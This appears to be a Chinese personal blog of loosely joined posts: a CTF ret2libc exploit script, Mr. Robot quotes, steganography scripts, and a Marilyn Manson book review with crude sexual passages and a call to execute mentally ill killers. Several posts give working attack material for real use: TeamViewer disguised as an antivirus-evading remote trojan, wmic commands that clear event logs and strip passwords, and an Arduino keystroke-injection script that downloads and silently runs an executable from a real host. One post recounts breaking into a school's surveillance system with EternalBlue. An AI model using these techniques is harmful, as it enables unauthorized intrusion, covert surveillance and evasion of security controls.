网鼎杯第三场的简单pwn

我这样的菜鸟都能做出来,说明这个pwn是真的简单

简单是简单,可惜电脑卡,kali虚拟机炸了,没拿到一血

首先一系列常规检查file ldd checksec,以及丢进IDA简单看两眼

32位程序,动态链接,用到libc.so.6,基本上没有缓解措施

IDA明显的函数名都给出来了,vul函数进去

明显的溢出

这种题就是套路,动态链接的,用ret2libc就挺方便的,如果nx开启也可以用ret2libc

然后再收集一下有用的信息

这里知道了导入了哪些函数还有vul函数的地址

用cyclic知道到返回地址前一共76个四字节

我们可以溢出两次,第一次跳到puts函数把read函数的地址给获取到,然后再用read函数的地址减去read函数的偏移,获取到libc的加载基址,再用libc的加载基址加上system函数的偏移,再溢出一次,跳转到system函数,搜索libc中的/bin/bash字符串作为参数,就ojbk了,这里随便找一个libc里的函数泄漏加载基址都可以,不过要找输出的函数来给你反馈结果

最后码出exp

from pwn import *
elf = ELF('./pwn')
libc = ELF('./libc32')
vul = 0x804850B
buffer_len = 76

context.log_level = 'debug'
p = remote('106.75.95.47',42264)
payload = ''
payload += 'A' * buffer_len 
payload += p32(elf.symbols['puts'])
payload += p32(vul)
payload += p32(elf.got['read'])
p.recvuntil('what do you want to do?')
p.send(payload)
resp = p.recvn(5)
print resp[1:5].encode("hex")
read = u32(resp[1:5])
print read
libc_base = read - libc.symbols['read']

payload = ''
payload += 'A' * buffer_len
payload += p32(libc_base + libc.symbols['system'])
payload += 'AAAA' 
payload += p32(libc_base + next(libc.search('/bin/sh')))
p.recvuntil('what do you want to do?')
p.send(payload)
p.interactive()

最后flag到手

好玩的电影台词

Is it that we collectively thought Steve Jobs was a great man, even when we know he made billions off the backs of children?Or maybe it’s that it feels like all our heroes are countefeit.The world itself is a big hoax.Spamming each other with our running commentary of bullshit,masquerading as insight,our social media faking as intimacy.Or is it that we voted for this?Not with our rigged elections,but with our things,our property,our money.I’m not saying anything new.We all know why we do this,not because Hunger Game books makes us happy.But because we are sedated.Because it’s painful not to pretend.Because we are cowards.fuck sociaty.

Sometimes I dream of saving the world.Saving everyone from this invisible hand,one that brands us with an employee badge.One that forces us to work for them.One that controls us everyday without us knowing it.But I can’t stop it.I’m not that special.I’m just anonymous,I’m just alone.

Everyone steals,that’s how it works,you think people out there is getting what they deserve?no,they’re getting paied over or under,but someone in the chain always gets bamboozled.

Our encryption is the real world.

What I wouldn’t give to be normal.To live in that bubble,the reality of naive.That’s how I justify this.To keep their optimism intact.To protect them.

Who are you playing tonight?

Communication is key.

Give a man a gun and he can rob a bank,but give a man a bank,and he can rob the world.It’s a bit silly expression,actually.A little reductive,but still.I like it,for the same reason most people hate it.because to me it means that power belongs to people that take it.Nothing to do with their hard work,strong ambitions,or rightful qualifications,no.The actual will to take is often the only thing that’s necessary.

The world is a dangerous place,not because of those who do evil,but because of those who look on and do nothing.

But when you look down to it,as its core,beneath every choice,there is either a one or a zero,you either do something or you don’t.

People walk around,act like they know what hate means,nah,no one does,until you hate yourself,I mean,truly hate yourself,that’s power.

There it is again,the invisible hand at work,controlling us,even if it pushes us past our threshold of pain.Choices,Maybe Mr.robot is right.That’s what this is all about,the yeses and nos of life.But do we decide them or do they decide us?

That’s the power you have,that’s the control you own,you dont have to just take what life gives you.

This is the world we live in,people relying on each other’s mistakes,to manipulate one another and use one another,even relate to one another,a warm,messy circle of humanity.

She’s got her own private maze too,wanting normalcy but stuck in the outer fringes,not knowing how to paticipate.

He did this to himself,he gave in,he was a coward,he was weak and pathetic,and in the end ,that’s what killed your father.

You are not sad?
Why should I be?It’s a beautiful night,the weather is nice,and I’m enjoying my cigarette.

The bug forces the software to adapt,evolve into something new because of it.work around it or work throught it,no matter what,it changes.It become something new,the next version,the inevitable upgrade.

Dont be shy,you can come closer,unsetting i know,your beta fish is chatting you up.but time is money.
You need something?your water,need any changing?
When you live in a fish bowl,ain’t no such thing as change,my entire life has been spent in this thing,my whole world is on your table,I look around,same shit,different day,the lighting,the furniture,even the sounds,always the same. I’m on a loop,and it won’t stop unless my life does.I’m exhausted with this world.
What can I do,can I help? I think it is pretty obvious.There is really one thing you can do for a brother in a fishbowl
What is it?
Move him to a goddamn window.

I just told them what they wantted to hear.you’re not gonna do it,are you?change the world.figures.you were only born a month ago,you’re afraid.Afraid of your monster.do you even know what it is?It doesn’t fit.

At some point an “action without user interaction” will come along and sweep my legs.this spinning wheel of false highs and true lows will continue.Daemons,they dont stop working,they are always active,they seduce,they manipulate.they own us.

People always makes the best exploits.

Find someone to be your honest self with,Bullshit.

These groups lack the resources and knowledge of the US cell to successfully mount an attack.

We’re all living in each other’s paranoia,you definitely can’t argue that,is that why people tries to avoid each other,i need to calm down,I need to be an observer like you,then I can think more calmly.

I avoid myself,why?I’m afraid,okay,Afraid of what?finding to much.too little,nothing at all.do I even exist?

There was a moment,a point in your recent past,a mistake,a compulsion,decision,something,that led you to this point right now,the best you can do,is to find that moment,understand it.It’s the only way to reconcile this failure with yourself.

Is any of it real?I mean,look at this!a world built on fantasy!synthetic emtions in the form of pills,psychological warfare in the form of advertising,mind-altering chemicals in the form of food,brain washing seminars in the form of media,controlled isolated bubbles in the form of social network,real?you want to talk about reality?we haven’t lived in anything remotely close to it,since the turn of the century,we turn it off,took out the batteries,snacked on a bag of GMOs,while we tossed the remnants in the ever-expanding dumpster of the human condition.we live in branded houses trademarked by corporations,built on bipolar numbers,jumping up and down on digital diplays,hypnotizing us into the biggest slumber mankind has ever seen.we live in a kingdom of bullshit.

If you want to change something,perhaps you should try from within.

When you look closely at the seams between order and chaos.do you see the same things I see?the strain,the tears,the glimpses of truth hidden underneath.why do they fight so desperately to mask what they are?or it’s that they become who they are when they put on the mask?

C’est la mort.

Angela:Who are you?Is this your home?I’ve been here for hours.
WhiteRose:I wanted to confirm that this wasn’t a waste of my time.
Angela:Well,what about my time?
WhiteRose:Oh,honey.My time is much more valuable than yours.Speaking of,I’ve only allotted 28 minutes for this conversation,which is very generous of me.So we should begin.
Angela:I’d like to leave.
WhiteRose:Oh,no,you wouldn’t.You’ve waited so long.Surely you want to know why.That is,if you indeedly believe that your time holds any value.You’ve been here close to four hours,and you never thought to walk out the door.
Angela:The door was locked.
WhiteRose:I’ve always found doors fascinating inventions.They hold the entry to unlimited imagination.Before you open any door,a world filled with possibilities sits right behind it.And it isn’t until you open it.they are realized.Such potential they bring to our minds.And yet a lock stop you from all of that.How….Lazy.

Which one are you playing tonight?

Not as sorry as I am,the truth is,after so many years,you became to lose more than just your appetite.You wear a mask for so long,you forget who you were beneath it.

Vi Veri Veniversum Vivus Vici

Artists used the lies to tell the truth, while politicians used them to cover the truth up.

Sometimes it’s the very people who no one imagines anything of,who do the things that no one can imagine.

You can not lose if you do not play.

Control is an illusion.

Is that what God does? He helps? Tell me, why didn’t God help my innocent friend,who died for no reason, while the guilty roam free? Okay, fine! Forget the one-offs. How about the countless wars declared in his name? Okay, fine! Let’s skip the random, meaningless murder for a second, shall we? How about the racist, sexist, phobia soup, we’ve all been drowning in because of him? And I’m not just talking about Jesus. I’m talking about all organized religion, exclusive groups, created to manage control, a dealer getting people hooked on the drug of hope, his followers nothing but addicts, who want their hit of bullshit to keep their dopamine of ignorance, addicts afraid to believe the truth, that there is no order, there is no power, that all religions are just metastasizing mind worms, meant to divide us so it’s easier to rule us, by the charlatans that want to run us. All we are to them are paying fanboys of their poorly written sci-fi franchise. Even I’m not crazy enough to believe that, distortion of reality

I’ll tell you, the human condition is a straight up tragedy, cuz.

My mom has no computer for Internet access to tempt me into the night.All that left for me is just ordinary analog sleep, ending the day’s loop.You might not think it’s a way to live, but why not? Repeating the same tasks each day without ever having to think about them.

Control is an illusion

How do I take off a mask when it stops being a mask, when it’s as much a part of me as I am? We keep fighting. Like the world we unmasked, we’ll find our true selves again. Maybe after wiping away the thick, grimy film of Facebook friend requests and Vine stars, we can all see the light of day. I know we haven’t talked in a while. Maybe you only trust me about as much as I trust you right now, but I’m gonna ask you to have hope for me anyway. Just,please,have hope.

一些写脚本的misc,脚本留着以后可以用

minified

解压出来发现是个png,一堆杂色,隐隐约约好像有字,看了看元数据里没啥东西,binwalk也没隐藏啥东西,改了改高度也没隐藏的信息,用Stegsolve看了看预设的几个通道,也没啥东西,估计就是在像素的低位藏了东西了吧,下面科普一下png的知识

png支持RGBA四个通道,每个通道占8个二进制位,隐写文件或数据一般都在各个通道的低位,因为低位的变化不会引起较大的视觉变化,图片还是原来的图片,但是你不知道是在哪个通道,这里有4个通道,如果藏在一个通道的低位的话,有四种可能,如果藏在两个通道的低位的话,可能进行各种运算操作后出现新的图片,加减乘除与或异或,具体的运算符也就7个左右,这样的话全部列举出来也不费多长时间,用python写个脚本留着以后用就好了,下面没有写各种运算符的循环

import cv2
import numpy as np
import os
def lowbit(x):
	return x&0x1
png = cv2.imread("flag_enc.png" , cv2.IMREAD_UNCHANGED)
b = np.zeros((png.shape[0] ,png.shape[1]), dtype=png.dtype)
g = np.zeros((png.shape[0] ,png.shape[1]), dtype=png.dtype)
r = np.zeros((png.shape[0] ,png.shape[1]), dtype=png.dtype)
a = np.zeros((png.shape[0] ,png.shape[1]), dtype=png.dtype)
b[: ,:] = png[: ,: ,0]
g[: ,:]  = png[: ,: ,1]
r[: ,:]  = png[: ,: ,2]
a[: ,:]  = png[: ,: ,3]
os.system("mkdir temp")
os.system("cd temp")
for i in range(0,4):
	for f in range(0,4):
		dst = cv2.bitwise_xor(lowbit(png[: ,: ,i]),lowbit(png[: ,:, f]))
		cv2.imwrite("temp/"+str(i)+"_"+str(f)+".png",dst*255)

 

忘了哪的题了,最后有一堆坐标,坐标,RGB之类的无非就是图片,看看最大的坐标都没超过300的,就用opencv创建画布,写进去就好了,脚本优化了一下,本来是循环300*300的画布,判断坐标是否在txt里,加上判断操作就很慢了,这里直接用zeros创建了画布是黑色的,那就循环坐标的数组改掉画布的像素再反相就好了,运行比较快不用等

import cv2
import os
import numpy as np
n=0  
canvas = np.zeros((300, 300, 3), dtype="uint8")
list=[]
f = open("123.txt")
line=f.readline().strip("\n")
while line:
	list.append(line.strip("\n").split(","))
	line = f.readline()
f.close()

for p in list:
	canvas[int(p[0]),int(p[1])]=[255,255,255]
canvas=cv2.bitwise_not(canvas)
cv2.imwrite("2.jpg", canvas)
cv2.imshow("Canvas", canvas)
cv2.waitKey(0)

就ojbk了

 

 

一句话凯撒

print "".join(["".join([chr(ord(i)-n) for i in a])+"\n" for n in range(-26,26)])

The long hard road out of hell书评(续更)

看名字,”地狱之外的漫漫长路”,结合他的主要思想,不难理解,这是他讲的他从一个单纯的傻孩子,变成一个”反基督”的过程,他对此感到无比幸运,如果没有经历这些帮助我成长的事情,”我”可能还是个虔诚的基督徒。网上好多人翻译成了”离开地狱的漫漫长路”,应该不是,应该是去地狱,而不是逃离地狱
自传在刚开头就引用了尼采的一段话,即一个被他人误解为幼稚的,不苟且停息的,蔑视一切,重新评估一切价值观的”反基督明星”出现。这个其实还是很好的,如果有一个被个人崇拜的”反基督明星大独裁者”出现,当权,来强制提高人口素质,把每个人都”约束”成强力意志的有思想的人,就天下太平了,尽管这不太可能,但也不能阻止我肯定尼采(当然除了他对女人的态度)

刚开始一句,献给他的父母,愿上帝宽恕他们,因为他们把”我”这个罪孽带来到了世上。这一句话怎么听怎么像放屁,没办法,曼森是装逼犯,我也经常说这种话,比如”我也学学人拿筷子吃饭,我也学学人坐在凳子上吃饭”,此类的看似自嘲实则讽刺人们太老套,太老旧的话语

第一部分”当我还是个幼虫”
第一章,你所恐惧之人
你所恐惧之人,应该是他的祖父之类的人,”你”,应该指的是”大多数人”。如果我理解的不对,我也宁愿这样去理解,就像人们理解古人的一首诗,非得研究研究背景,非得八卦猜出人家的真实意图,而最后你猜出的也不一定百分之百正确,你要承认这只是你的理解,或者谦虚的说这是你的”曲解”,这样才符合自身情况,可以用来借鉴,又尊重诗者本人。你的理解只是篡改的副本。
第一部分第一章大篇幅的描写了他和表弟因为好奇心的驱使而对祖父”肮脏污秽”的地下室的探索,后来外祖父的一些其他事也浮出水面,外祖父偷穿女人内衣,外祖父地下室满是情趣用品,外祖父简直是个死变态。然而后来的采访中,他透漏,他的祖父是被误解的人(傻逼主持人一直强调说曼森因为祖父而有童年阴影,真是傻逼死了,跟她说了无数遍曼森现在认同祖父,她全当没听见),当然,我们要尊重,要包容,但是每当听到人们说包容这个词,我就很不爽,就像台湾刚宣布同性婚姻合法,人们嫌这是专法,而不是什么都顾全的,通用的格式,没有漏洞的语句,你就跟个傻子似的在法律条文里写个同性婚姻合法,跨性别的,无性别的,异性恋的等等就不高兴了,所以,不是包容,这本来就是很自然的,每想到这里,我就生气,用粗俗的话说,就是”我没草泥马,那么我拆故宫都不关你的闲事”,包容这个词的话,从本身就否认了被包容对象的正确性。所以,我们要尊重,你不喜欢你可以不看,我没草泥马(我没侵犯你的任何权益)

第二章 对于那些准备摇滚的人,我们将阻止你
“有确凿证据显示,在普莱斯女士在研讨班上详细讲述这个世界即将来临的终极审判时,我发现了她身上一些性感的地方。看着她站在讲台上,活像一只暹罗猫,她撅起的嘴唇,梳理地很精致的头发,丝质的短衬衫,隐藏着欠操的感觉的身躯,和招人来干她屁股的走姿,我可以说那儿有东西是活灵活现的,正等着来一次怒吼,当在基督表象下爆发的,那种欲望被压抑时的怒吼。我怨恨她,因为她让我整个年少时期充满了梦靥,但是我又觉得这种怨恨更多地来源于我借用她所产生的性幻想和春梦。”

“紧接着她在房间的角落拿出一根教棍,这个手工课上的朋友设计的玩意儿颇有性虐风格,上面的洞将风阻降到了最大。我遭受到了三个快准狠的基督式重击。”

这两段很精彩,看起来曼森更像是通俗版的鲁迅

一天一天的过去,世界看起来很平和,没有所谓的世界末日的一丝踪影,单纯幼稚的manson感觉被骗了,他不喜欢他的学校,他要换地方,于是开始走上了通向地狱之路,反叛之路。当然这里说的他觉醒感觉到自己被世界末日救赎的谎言给骗了,甚至一度有罪恶感,害怕自己不会被救赎,说的实际上不仅仅是这个世界末日的谎言,这只是一种说法,世界末日的谎言未免太站不住脚了,上帝这个神的谎言也未免太站不住脚,说的应该是通用的,一切扭曲的强加在人们身上的价值观,一切服务于政治的编造

看到这里就想起了Mr.robot里的一段话
Is that what God does? He helps? Tell me, why didn’t God help my innocent friend,who died for no reason, while the guilty roam free? Okay, fine! Forget the one-offs. How about the countless wars declared in his name? Okay, fine! Let’s skip the random, meaningless murder for a second, shall we? How about the racist, sexist, phobia soup, we’ve all been drowning in because of him? And I’m not just talking about Jesus. I’m talking about all organized religion, exclusive groups, created to manage control, a dealer getting people hooked on the drug of hope, his followers nothing but addicts, who want their hit of bullshit to keep their dopamine of ignorance, addicts afraid to believe the truth, that there is no order, there is no power, that all religions are just metastasizing mind worms, meant to divide us so it’s easier to rule us, by the charlatans that want to run us. All we are to them are paying fanboys of their poorly written sci-fi franchise. Even I’m not crazy enough to believe that, distortion of reality.
下面是爸爸我的翻译
这就是上帝干的事吗?他帮助我们吗?那告诉我,为什么他不帮助我那无辜死去的朋友,却让真正的罪人逍遥法外。好的,先别说那些个例。说说那些无数的以他之名发动的战争怎么样?好的,先别说这些随机的,没有意义的谋杀吧。说说我们陷入的那些种族主义,性别歧视,恐惧灌输。并且我没有只是说耶稣,我说的是所有的宗教组织,排外团体,被创造出来控制群体行为。一个贩卖缥缈虚无的希望的毒品的毒贩子,他的追随者不过是一个个瘾君子,想要吸一口希望的毒来维持他们无知的多巴胺,不敢面对现实的瘾君子,根本没有秩序,没有神力,所有的排外团体不过是传播瘟疫的下流种,为了分裂我们不择手段,这样才能更好的控制我们,一群想要凌驾于我们之上的王八犊子。我们对他们来说只不过他们书写的残废科幻的付钱的粉丝。就算我也没疯到去相信这种对现实的扭曲的地步。

贪婪好色之徒,暴食之徒,贪得无厌之徒,他的“反叛”和“罪行”其实是超人的行为,对于低等人,要帮助改造他们,或者整治他们。

第三章
年少的半吊子
整整一章就说了说自己的骚J8往事,意淫谁,跟谁啪啪啪过,以及自己吸过毒,

第四章
通往地狱之路充满着姽词连篇的拒绝信
我那时有些孤僻,并且很快学得了不友善的言谈举止,这让我在校园的日子里很不受欢迎。我同大多孤单的孩子一样,有编造小故事和与臆想出的人对话的习惯。我想我的文学抱负中夹杂着这些被孤立和低估的感受。我知道自己有对文字的天赋,也有面对逆境的能力。并且我觉得,这些东西可以说创造了一个人的世界,在这里我人生的每一个缺憾都能得到弥补。——乔治·奥威尔,Why I Write
一开始就引用了这么一段话,赞美一下自己吧可能是,你可以在这个冰冷的随机的世界里创造一个自己的世界,超人必须有这么一项能力,你要有臆想的能力,不要把它看成一种病症,这是唯一你能坚持自己的价值观,而又不让自己的精神轰然倒塌的神力,逆境不会打败没有标准的人,没有标准的人天生脸皮厚,不是一般的厚,当然是另一种意义上的脸皮厚,不是你我所说的脸皮厚,脸皮薄的人会大声嘶吼着苟且停息

后面吧,是manson年轻时候写的一篇小说,投稿了,我感觉没什么意思,因为我唯一不满的就是manson的自残,强力意志的人怎么能自残,当然他自残也不管我什么事,我不自残,你自残我也不歧视你。

第五章
我生来就没有那么多的中指
其实,世界是女人的,所有的幸福家庭都是由女同性恋组成的,女人是比男人更优越的物种,男人和女人分类的依据不是性器官之类的,也不存在纯粹的男人或女人。
女人应该都是施虐狂,男人就应该被奴役

有几章表达的内容并不符合我的胃口,但是我为什么还要捋着他这本书来说我的人生观价值观,因为我嘴笨
就比如说他对待女人轻浮的态度,虽然说在某一方面不是轻浮的,总体来说,客观来说是轻浮的,他自己也不够女人

第六章
鬼魅般的小孩
Marilyn Manson是对像我这样失意的笔者来说最完美的故事主角名。他是一个这样的角色——因为他蔑视他周围的世界,更多的,以及他自己,所以他要尽其所能去哄骗人们去喜欢他。接着,一旦他赢得了人们的信心,他会用此来摧毁他们。
想起希特勒和尼采。还有Mr.Robot里科比的一句话,If you want to change something,perhaps you should try from within.
演讲家,这是革命成功的方法论,然而在“这种实际情况下”,如果你想去影响什么,首先要成为一个不仅仅是思想上的超人,还要具备一些必要的技能,比如“骗术”
所有的人都无所谓,那就真的无所谓了,好多事情都是无所谓所造成的,你的无所谓不是你的口味而已,而是你是低等人。而很多有所谓也是低等人造成的,就像我之前说的,有些事情不是你的口味而已,不是因人而异的,而区分这些因人而异和不因人而异的所谓“口味”所决定的问题,也只有超人能做到,control is an illsion,但是超人不是人造出来的。

另外这一章有些不严谨的地方,我一直相信这个世界上没有精神病人,除了那些生理上不capable的人,别的所谓的精神不正常的都是正常人,所以,杀无辜的人的精神病必须死,该死,进监狱养着干什么?浪费粮食,当然我并不知道有的人是怎么想的,所以这个偏激的想法或许有人可以对号入座,或许也没有

这里不知道突然引用的谁的话
说了个Mechanical Man
“Mechanical Man”的歌词表面上是很幼齿的押韵文,但它依旧有对艾滋病,人类向来已久的出于无知而自毁的习惯,科学,宗教,性或毒品这些东西的隐喻。
这里说的不多,所以我想借用来符合以下咱们的情况,这里避嫌了,用了个咱们,你懂得。manson后来有一首歌曲,mechanical animals,当然,考虑到他的境况,这肯定又是老一套的讽刺耶稣基督骗局下的人们,像机械动物一样,他们所听从的只是别人,不是自己,别人说什么就是什么,即人们没有自我意识,control is an illusion。你的口味是外界影响的,你的偏好取决于你所处的环境,你的愚蠢也逃脱不了你的教育。只有超人才capable of逃脱外界的影响。不要跟个傻逼似的反驳我,逃脱外界影响不是不受外界影响,是开启混杂模式而又自己取舍,取舍之后又不会成为一辈子的定则,不断更新,不苟且停息,所以取舍不是别人的取舍,是自己的取舍,低等人的话,连混杂模式都不开启

VB释放资源文件

Private Function UnRes(ByVal ResID As Integer, ByVal ResName As String, ByVal UnResPath As String)
    Dim Temp() As Byte
    Temp = LoadResData(ResID, ResName)
    Open UnResPath For Binary As #1
    Put #1, , Temp()
    Close #1
End Function

首先要用资源编辑器生成res文件

TeamViewer当远控木马

首先Teamviewer肯定是不会报毒的

你在渗透中遇到一个电脑,只有shell,没有开3389,咋提权也提不动,或者在内网,端口转发也很困难,你准备上传个远控木马,方便快捷,然而还有360或者其他杀软,就上传TeamViewer吧,可是他没有命令行界面啊

咋办呢,

teamviewer目录下有一个rolloutfile.tv13文件,里面存着被控端ID,密码咋办,首先把密码设置成固定的肯定会方便点,然后CE试了一遍搜不到密码,目录下也没配置文件,于是搜注册表搜到了如下内容

密码也是加密的,看起来也好复杂的样子,那就不管了,直接导出reg,以后导入注册表就行了呗

 

拿到shell,上传压缩包,上传busybox.exe(windows版busybox),上传reg,busybox unzip

start teamviewer.exe,busybox cat rolloutfile.tv13,regedit /s **.reg

你说teamviewer会触发uac,msf里有bypass uac的插件

后渗透中用到的一些实用命令和淫贱手段(持续更)

首先wmic
wmic cpu list brief/full
wmic memphysical list brief/full
这两个不是提权用的,但是你懂得,看看详细配置,值不值得提权

wmic process get commandline,caption,executablepath
关于进程的这三个经常用,首先你要知道进程的名字caption,如果你想看看进程启动的参数就看commandline,如果你想看看进程对应的文件就看看executablepath,尤其是在tasklist命令被禁用的时候
可以用这个wmic的process命令,如果再不行,就上传一个windows版busybox,运行busybox ps

创建进程,杀死进程
wmic process call create “taskmgr.exe”
wmic process where name=”explorer.exe” call terminate

查看安装了啥
wmic product get name
查看运行的服务
wmic service where (state=”running”) get caption, name, startmode
查看启动项
wmic startup get Caption, Command

用下面这个来看是否是虚拟机
wmic onboarddevice get Description,DeviceType,Enabled,Status /format:list

锁定某账户
wmic useraccount where name=’demo’ set disabled=false

删掉密码
wmic useraccount where name=’demo’ set PasswordRequired=false

更改用户名
wmic useraccount where name=’demo’ rename hacker

查看杀毒软件安装路径
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

删除系统日志
wmic nteventlog where filename=’system’ cleareventlog

有的时候碰到360,或者其他的杀软,有时候tasklist看一眼进程你会发现杀软是运行在administrator下的,用query user看一下他的id,给他logoff了 ;)就好了

用vbs隐藏程序
Set wShell = CreateObject(“WScript.Shell”)
wShell.Run “”,0

Arduino Leonardo实现HID攻击

#include<Keyboard.h>

void setup(){
  Keyboard.begin();
  delay(1000);
  Keyboard.press(KEY_CAPS_LOCK);
  delay(200);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500); 
  Keyboard.press('r');
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(200);
  Keyboard.println("powershell -Command $win=$Host.UI.RawUI.WindowSize;$win.Height=1;$win.Width=1;$Host.UI.RawUI.Set_windowsize($win);powershell");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(4000);
  Keyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(500);
  Keyboard.println("$P.dOWNLOADfILE('http://jsjxy.aust.edu.cn:8090/789.exe','d:\\789.exe')");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(1000);
  Keyboard.println("powershell -command start-process d:\\789.exe -WindowStyle Hidden;exit;exit");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}
void loop()
{
}

代码是在大佬的代码基础上改进的

这里如果直接用-Command下载被控端会被360拦截,分步便可绕过

并且

powershell -Command $win=$Host.UI.RawUI.WindowSize;$win.Height=1;$win.Width=1;$Host.UI.RawUI.Set_windowsize($win);powershell")

用这个可以先把powershell窗口搞成特别小,当然我们可以运行了powershell再输-Command后面的这些内容,但是停留时间太长就太吓人了,然后运行完了Command后powershell会退出,这时候在在poweshell里执行一下powershell不就好了 ; )

然后敬上github上大神的免杀meterpreter

最后

powershell -command start-process d:\\789.exe -WindowStyle Hidden;exit;exit

隐藏运行完被控端退出powershell窗口

编译好放到服务器上

https://github.com/codeliker/mymig_meterpreter

根据目标主机配置适当调整延时,就好了
买了个otg转接头,阿里巴巴上批发,挺好用的

最后做了个拙劣的U盘壳
最后成功弹shell

狗血的一次拿下学校全校监控

有一天群里的老哥发了个ip,说是学校的监控系统的后台,进去看了看,是啥宇视科技可视化报警管理平台,搜了搜网上也没啥公开的漏洞,于是试了试弱口令也没进去,于是用我的永恒之蓝批量扫描工具扫了扫整个网段,有两个嵌入式windows,有三个win7旗舰版64位,嵌入式windows的拿不下,三个win7拿下了两个,第一个win7进去了发现权限很低,啥也干不了,getsystem没用,run getgui -e也没用,各种提权脚本和开3389的工具也试了,也没用,c盘没有写入权限,会触发UAC,瞎翻文件夹想找找有没有监控客户端的配置文件,如果存着密码就好了,找了找没有,然后想kill掉浏览器进程然后抓包,发现抓包没权限,崩溃了,又切换到D盘上传远控木马,试了好几个马都不上线,气得我够呛,又传了个teamviewer,然后在meterpreter里用screenshot -v true截屏,被全屏的监控页面挡住了,发现鼠标在动,又不敢结束掉浏览器进程,看不见teamviewer的帐号密码,气的够呛,然后就截屏看着玩吧,其实可以把webcam_stream这个的代码改一下,也可以实时监控屏幕,就是分辨率高有延迟,截屏看着玩,定睛一看右上角很小的字”欢迎您********”,于是把激动万分的我把********输到帐号密码那里,进去了,弱口令,就是知道一个用户名的问题,然后你懂得

食堂,宿舍,教学楼,实验楼,户外。。。。。。。还能语音对讲。。。。。

用到的工具eternalblue_doublepulsar

里面eternalbluepiliang是拿别人的单个ip检测脚本改的,然后eternalblue.py和doublepulsar.py怎么用一看就知道了,为了方便写的

用msfvenom生成dll放在目录里命名成eternal11.dll就行了